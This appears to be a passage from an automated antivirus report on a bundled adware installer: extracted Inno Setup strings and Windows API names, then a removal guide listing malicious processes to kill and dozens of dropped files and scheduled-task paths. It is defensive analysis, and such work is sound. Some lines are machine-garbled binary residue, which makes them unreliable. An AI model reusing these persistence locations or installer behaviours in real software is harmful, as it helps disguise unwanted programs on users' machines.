function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
SUPPRESSIBLEMSGBOX
GetWindowsVersionEx
IMsgt
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.3) (u)
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
GetKeyboardType
kernel32.dll
UnhookWindowsHookEx
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MapVirtualKeyW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
ExitWindowsEx
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
msimg32.dll
gdi32.dll
SetViewportOrgEx
version.dll
mpr.dll
TransactNamedPipe
SetNamedPipeHandleState
GetWindowsDirectoryW
GetCPInfo
CreateNamedPipeW
RegQueryInfoKeyW
RegFlushKey
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
comctl32.dll
ole32.dll
shell32.dll
ShellExecuteExW
ShellExecuteW
comdlg32.dll
;0"!:/#!:/#!:/#!:/#!:/#!:/#!:/#!:/#!:/#!:.#!<1"!7,
`.rdata
@.data
.pdata
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>KWindows
6MsgIDs
Msgs
UrlMon
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryA
RegOpenKeyA
RegCreateKeyExA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
OnKeyDown
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
%s_%d
USER32.DLL
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
uxtheme.dll
DWMAPI.DLL
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
crSQLWait
%s (%s)
imm32.dll
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
RegDeleteKeyExW
.DEFAULT\Control Panel\International
%s, ClassID: %s
%s, ProgID: "%s"
oleacc.dll
MSFTEDIT.DLL
RICHED20.DLL
Rstrtmgr.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
@Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.4 (u)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFiles: No files matching "%s" found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
Expression error '%s'
Password
SuppressMsgBoxes
srcexe
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.4 (u)
Original Setup EXE:
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.4 (u)
Portions Copyright (C) 2000-2013 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
RegDeleteKeyExA
System\CurrentControlSet\Control\Windows
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Invalid RootKey value
Unknown custom message name "%s"
%u.%.2u.%u
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
Interface not supported
7Dispatch methods do not support more than 64 parameters
Exception: %s
Cannot Import %s
Unable to insert a line Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
No help found for %s
Unsupported clipboard format
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters#''%s'' is not a valid integer value
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.1052.0.0
RightBackup.exe_644_rwx_04000000_00002000:
%UKv%
RightBackup.exe_644_rwx_654D9000_00004000:
].elm.e,`.e
g.e`Q.exf.eh^.e
e.e0X.e e.e\`.epd.e
].eHc.e
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
install.exe:1768
~ssqyvbc.exe:2532
ping.exe:664
vcredist_x86.exe:1516
systweakasp.exe:3000
schtasks.exe:3420
schtasks.exe:1376
schtasks.exe:452
schtasks.exe:1156
schtasks.exe:460
schtasks.exe:1736
schtasks.exe:416
schtasks.exe:1952
schtasks.exe:1248
schtasks.exe:188
schtasks.exe:1004
btdal_4.exe:3492
~nvpitzc.exe:1180
aspsetup.exe:3592
SystemSpeedup.exe:2964
MsiExec.exe:1180
~aclxxmg.exe:3608
taskkill.exe:3808
taskkill.exe:3864
taskkill.exe:3140
taskkill.exe:2096
taskkill.exe:3536
taskkill.exe:3296
taskkill.exe:3368
taskkill.exe:3576
taskkill.exe:3100
taskkill.exe:3436
taskkill.exe:3664
taskkill.exe:3764
taskkill.exe:3604
taskkill.exe:460
taskkill.exe:3708
taskkill.exe:3264
taskkill.exe:3408
taskkill.exe:3320
taskkill.exe:3464
taskkill.exe:416
taskkill.exe:2532
taskkill.exe:1660
BackgroundHost.exe:3236
win-app_update_3.exe:2120
myapp_update_1.exe:1508
regsvr32.exe:3276
regsvr32.exe:2748
regsvr32.exe:3296
regsvr32.exe:188
regsvr32.exe:3396
Deeal.exe:3072
ssupsetup_sbinstall3_sbinstall3.exe:2716
%original file name%.exe:1068
ssupsetup_sbinstall3_sbinstall3.tmp:2724
aspsetup.tmp:4036
rightbackupsetup.exe:3220
Reporter.exe:2608
Reporter.exe:3008 - Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE5D0.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Application Data\ASP\aspsetup.exe (2966308 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE5D0.tmp\_isetup\_iscrypt.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE5D0.tmp\isxdl.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\rightbackup\rightbackupsetup.exe (2531561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dd_vcredistMSI44B8.txt (546741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dd_vcredistUI44B8.txt (115346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VWL52.tmp (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Reporter.exe (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ssupsetup_sbinstall3_sbinstall3.exe (141333 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1049.txt (387 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1040.txt (13 bytes)
C:\5cf940aa749fd37a36c73657ff\globdata.ini (1 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.3082.dll (1487 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1036.txt (224 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1041.txt (5 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1028.dll (693 bytes)
C:\5cf940aa749fd37a36c73657ff\vcredist.bmp (5 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1033.dll (1390 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1040.dll (1754 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1031.txt (15 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1036.dll (1925 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.2052.txt (405 bytes)
C:\5cf940aa749fd37a36c73657ff\vc_red.msi (3475 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1042.txt (5 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.3082.txt (12 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1031.dll (1585 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1028.txt (3 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.2052.dll (1368 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1033.txt (10 bytes)
C:\5cf940aa749fd37a36c73657ff\install.exe (8790 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1049.dll (1437 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1041.dll (983 bytes)
C:\5cf940aa749fd37a36c73657ff\install.ini (844 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1042.dll (1851 bytes)
C:\5cf940aa749fd37a36c73657ff\$shtdwn$.req (788 bytes)
C:\5cf940aa749fd37a36c73657ff\vc_red.cab (56236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2U700.tmp\systweakasp.tmp (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut54.tmp (7617 bytes)
%Documents and Settings%\%current user%\Application Data\~hwobqxw.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut57.tmp (3545 bytes)
%Documents and Settings%\%current user%\Application Data\~aclxxmg.exe (85220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\service[1].exe (324153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_Temp_cccwmay.tmp\Deeal.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_Temp_cccwmay.tmp\uninstall_betadeeal.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\systemTaskSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\time_range[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemTaskSet[3].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemTaskSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\systemTaskSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemTaskSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ETN50.tmp\aspsetup.tmp (7386 bytes)
%Documents and Settings%\%current user%\Application Data\System Speedup\bl.txt (556 bytes)
%Documents and Settings%\%current user%\Application Data\System Speedup\eng_rcp.dat (4708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\installtracker[1].htm (556 bytes)
%WinDir%\Tasks\System Speedup_UPDATES.job (276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\installtracker[1].aspx (516 bytes)
%Documents and Settings%\%current user%\Application Data\System Speedup\log_08-13-2014.log (2516 bytes)
%WinDir%\Tasks\System Speedup_DEFAULT.job (268 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-FO8JE.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-FO8JE.tmp\isxdl.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\conf[1].txt (126 bytes)
%Documents and Settings%\%current user%\Application Data\betadeeal\new_conf.ini (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~ssqyvbc.exe (521574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemspeedupSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getCaping[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ssupsetup_binstall3[1].exe (1987998 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemspeedupSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aff.conf (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OnlineBackup.exe (440794 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse42.tmp\LogEx.dll (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\log.txt (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse42.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\AccessControl.dll (8 bytes)
%Program Files%\MyPC Backup\UnRegisterExtensions.exe (15 bytes)
%Program Files%\MyPC Backup\Database\mpcb_file_cache.db (7 bytes)
%Program Files%\MyPC Backup\AWSSDK.dll (106386 bytes)
%Program Files%\MyPC Backup\Database\mpcb_sig_cache.db (6 bytes)
%Program Files%\MyPC Backup\Crypto32.dll (1856 bytes)
%Program Files%\MyPC Backup\syncicon.ico (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcredist_x86.exe (328506 bytes)
%Program Files%\MyPC Backup\diffstack.dll (1552 bytes)
%Program Files%\MyPC Backup\AlphaVSS.60.x86.dll (5520 bytes)
%Program Files%\MyPC Backup\Crypto64.dll (1856 bytes)
%Program Files%\MyPC Backup\AlphaVSS.Common.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\nsSCM.dll (5 bytes)
%Program Files%\MyPC Backup\Service Start.exe (14 bytes)
%Program Files%\MyPC Backup\x86\System.Data.SQLite.dll (30464 bytes)
%Program Files%\MyPC Backup\AlphaVSS.52.x64.dll (5520 bytes)
%Program Files%\MyPC Backup\BackupStack.exe (1552 bytes)
%Program Files%\MyPC Backup\RestartExplorer.exe (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\ns46.tmp (6 bytes)
%Program Files%\MyPC Backup\AlphaVSS.51.x86.dll (4992 bytes)
%Program Files%\MyPC Backup\RegisterExtensionDotNet20_x86.exe (784 bytes)
%Program Files%\MyPC Backup\es_ES.mo (1856 bytes)
%Program Files%\MyPC Backup\mypcbackup.ico (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\nsExec.dll (6 bytes)
%Program Files%\MyPC Backup\GetText.dll (12 bytes)
%Program Files%\MyPC Backup\Shared Stack.dll (90365 bytes)
%Program Files%\MyPC Backup\Database\mpcb_backup_conf.db (16 bytes)
%Program Files%\MyPC Backup\MPCBContextMenu.dll (219601 bytes)
%Program Files%\MyPC Backup\AlphaVSS.52.x86.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\nsRandom.dll (784 bytes)
%Program Files%\MyPC Backup\LinqBridge.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mpbtrk.log (8 bytes)
